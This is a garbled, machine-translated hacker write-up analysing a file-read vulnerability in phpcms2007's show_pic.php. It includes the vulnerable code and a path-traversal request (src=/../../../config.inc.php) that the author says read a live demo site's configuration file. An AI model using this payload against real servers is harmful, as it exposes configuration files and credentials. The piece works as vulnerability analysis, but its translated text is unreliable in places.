We know that in asp appears to be the most or thesql injection, but in php since magic_quotes_gpc is on case special characters will be escaped, so even if there are a lot of times theresql injectionalso I can not use. But php powerful file operation function, but so that we can experience in asp can not appreciate the fun, I think php comes with a file operation function will allow you to beat faster~~Hey Hey
This time I discover that phpcms2007 source code disclosure vulnerability
Again to Phpcms2007 of open-source behavior of a tribute to it!!!!
findstr /s /n /i readfile *. php >readfile.txt (I only give out useful)
Other file manipulation functions can define your own lookup
module\picture\show_pic. inc. php:8:readfile($file);
Follow up this file to see it, ha ha, is relatively small, I like
[Copy to clipboard] [ - ]CODE: <? php defined('IN_PHPCMS') or exit('Access Denied'); require PHPCMS_ROOT.'/ module/'.$ mod.'/ include/common.inc.php'; isset($src) or exit; $file = PHPCMS_ROOT.'/'.$ PHPCMS['uploaddir'].'/'.$ CHA['channeldir'].'/'.$ MOD['upload_dir'].'/'.$ src; if(empty($PHP_REFERER) || ! strpos($PHP_REFERER, $PHP_DOMAIN)) $file = PHPCMS_ROOT.'/ images/error.jpg'; header("Content-type:image/pjpeg"); readfile($file); ?& gt; All the way to the analysis.
The first contains the file/module/'.$ mod.'/ include/common.inc.php
If there is a variable$src then give it the path and the value to the variable$file
Then it enters the if
Here I do not see other files is simple guess the next should be to determine the url path of the source, i.e. the anti-theft chain function
And then header()to a picture header
Oh, gently pine pine on the readfile($file);
As can be seen it is not determined that the$src file type, if we submit a src=*. php is also readfile
Well, here vulnerability is the emergence of the
However, due to the“defined('IN_PHPCMS') or exit('Access Denied');”, so we cannot directly exploit this vulnerability files.
Only in the the other contains this file in the php file use
[Copy to clipboard] [ - ]CODE: findstr /s /i /n show_pic.inc.php *. php >show_pic.inc.php.txt
picture\show_pic. php:4:require PHPCMS_ROOT."/ module/".$ mod."/ show_pic.inc.php"; Take a look inside
[Copy to clipboard] [ - ]CODE: <? php require "./ config.inc.php"; require "../include/common.inc.php"; require PHPCMS_ROOT."/ module/".$ mod."/ show_pic.inc.php"; ?& gt; Oh, if register_globals is on, then you can directly use this file to read the target file.
That's the test.
The official demo Station is
[Copy to clipboard] [ - ]CODE: /picture/show_pic.php?src=/../../../config.inc.php Hey Hey, read that Web site's configuration file
With nc Contracting
the get option is set to
[Copy to clipboard] [ - ]CODE: /picture/show_pic.php?src=/../../../config.inc.php Here I went with a hedgehog of a post submission tool instead.
The test results shown in Figure
ok, on the analysis here.
Hope you do not use this to do something illegal, Hey Hey all!!!